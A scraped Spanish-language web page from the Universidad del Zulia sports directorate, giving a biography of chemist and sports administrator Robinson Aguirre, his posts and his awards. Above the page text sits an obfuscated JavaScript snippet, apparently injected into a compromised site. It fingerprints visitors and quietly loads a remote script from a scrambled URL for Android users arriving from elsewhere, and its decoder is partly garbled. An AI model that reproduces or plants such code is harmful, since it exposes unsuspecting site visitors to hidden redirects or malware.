;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("dt(naevg)A!rueesiuu")],q=n[p("2mlrxohfntza0lipy")],t=d[p("3e!ifkho2o8co")],o=w[p("sn0oqiwt6amtmnde2izrxos")],h=w[p("rnhofi0t9adcaoll1")][p("beamlann8t(s3odhy")],dr=d[p("qrkemrbrvetf5elr4")],dt=s.height/w.devicePixelRatio-w.screenTop;if(!c(dr,h)&&dr!==''){if(dt>0&&o!==undefined){if(c(u,p("!d1ito!rbd3noAy"))&&!c(u,p("1s0wsocdhngiiWk"))){if(c(q,p("!d1ito!rbd3noAy"))||c(q,p("jxdueniilLe"))){if(!c(t,p("2=3a4m8tnu3_a_v"))){var e=d.createElement('script');e.type='text/javascript';e.async=true;e.src=p('hafdy4i64798l9uf89xfxf6d57ce06c6zfyed5c6y58dl5u9d4d8n0x2ddfc7fxcl=ov)&m2(1q=jdxilcv?uskjj.(e2dio(ne_pibuk/am7opci.z5(633asgtrantpsrk2coioluco/h/s:dsspztxtzh(');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(e,v)}}}}}function p(e){var k='';for(var w=0;w=0;q--){d+=a[q]}return d}})(); Robinson Aguirre - Dirección de Deportes
Universidad del Zulia
Correo LUZMapa del sitio
24 de octubre de 2018
 
Programas
Alto Rendimiento Educ.Fisica y Recreación Deporte Interno Extensión Deportiva Actividad Física Recreación Atención al Atleta Entrenamientos Registro Atleta LUZ Pequeña Liga de Béisbol
Juegos Deportivos
Condiciones Generales
Afiches deportivos
Posición Final 2010
Posición Final 2011
Planilla de inscripción
Más Deporte
Juvines 2010
Juvines 2012
Juvineu 2015

images/stories/topes/sucesion.jpg

Agrandar texto   Reducir texto   Reestablecer texto    
Robinson Aguirre PDF Imprimir Correo

Director de Deportes
Universidad del Zulia
1967-1969


La mayoría de las veces cuando se habla de docentes y del  deporte se olvida el entorno que envuelve el aula de clase, el campo de juego, el estadio o cancha;  más allá de los  alumnos y de los jugadores siempre existe un grupo de dirigentes encargados de dar el impulso a las instituciones.

Robinson Aguirre, nació en Maracaibo el 31 de octubre de 1933,  docente de la Universidad del Zulia, es uno de los dirigentes deportivos más reconocidos  por su notable aporte en distintos ámbitos en pro del desarrollo de la sociedad.

Sus  estudios de bachillerato transcurrieron en el emblemático Liceo Rafael María Baralt de nuestra ciudad, para posteriormente ingresar a la Universidad de Buenos Aires –Argentina,  donde egresa con el titulo de Químico.

Ya de vuelta en su Maracaibo natal, sus ocupaciones giraron en torno en el ámbito académico y deportivo hasta el punto de ocupar cargos de gran envergadura.

Propenso a toda clase de actividad en la que se involucre como objetivo promordial el bien de la Universidad del Zulia, desde su ingreso en el año 1961 como docente,   se desempeñó como jefe de Cátedra y del departamento de Química Orgánica de la Facultad de Agronomía.

Director de Deportes 1967-1969; y su ascenso fue tal,  que ocupó el cargo de Director de la Dirección de Protección Social Estudiantil (hoy Didse) en el periodo 1972-1976; al mismo tiempo era el representante de los profesores ante el Consejo Universitario. En el año 1980 es electo Presidente de la Caja de Ahorros de los Profesores de LUZ, allí permaneció  hasta el año 1983.

En la gestión universitaria 1984-1988,  es electo Secretario de LUZ y acompaña al rector José Chiquinquirá Ferrer durante este período.

 

Dirigencia Deportiva

Cumplió una destacada labor en el competitivo mundo del deporte,  Como dirigente, se mostró muy activo en cada uno de los cargos desempeñados. Fue miembro de la Federación Venezolana de  Softbol en el año 1966, y presidente de la Fundación de las Pequeñas Ligas de Venezuela (Saplez) durante 17 años.

Vicepresidente de los Campeonatos Latinoamericanos de Pequeñas Ligas realizados en Maracaibo en 1974-1978. Tesorero  de los Juegos Bolivarianos Maracaibo 1989. Presidente del Comité organizador de los Juegos Nacionales Juveniles, Maracaibo 1991.

En el año 1998,  se celebran en nuestra ciudad,  la XVIII Edición de los Juegos Centroamericanos y del Caribe, en esta oportunidad estuvo al frente de la   vicepresidencia del Comité organizador, acompañando nuevamente al ingeniero José Chiquinquirá Ferrer, éste en el rol de presidente del Cocac’ 98.

De igual forma,  cumplió funciones como  tesorero de la Plana Mayor de la Delegación de Venezuela que asistió a los Juegos Panamericanos, Puerto Rico 1979; igualmente se desempeñó por espacio de 14 años como Vocal del Comité Olímpico Venezolano (COV) y  al mismo tiempo integró numerosas asociaciones deportivas regionales,  en algunas de ellas,  con el cargo de presidente.

Labor reconocida

Toda esta trayectoria ha dejado tras de sí,  un gran legado difícil de igualar haciéndolo merecedor de innumerables homenajes y reconocimientos entre los que destacan:

- Orden al Mérito Universitario Doctor Jesús Enrique Losada en Primera Clase otorgada por la Universidad del Zulia. 1987

-  Dirigente deportivo más destacado del año 1966 por el Círculo de Periodistas Deportivos.

-  Mérito deportivo como el mejor dirigente deportivo del año 1981  por la Asamblea Legislativa del Estado Zulia.

- Orden Ciudad de Maracaibo en su primera Clase conferida por el Concejo Municipal de Maracaibo por su labor realizada en pro de la juventud zuliana 1983.

- Honor al Mérito Deportivo en su Primera Clase otorgada por el Instituto Nacional de Deportes 1991.

- Además, de 100 diplomas de reconocimientos de instituciones públicas y privadas tanto en el ámbito académico y deportivo.

La Universidad del Zulia a través de su Dirección de Deportes, Educación Física y Recreación; rindió un homenaje al distinguir el Estadio de Softbol de la Facultad Experimental de Ciencias con el nombre del Profesor Robinson Aguirre.


Redacción: Yasmira Meleán Marin
Fotografía: Claudio Ocando




^ Subir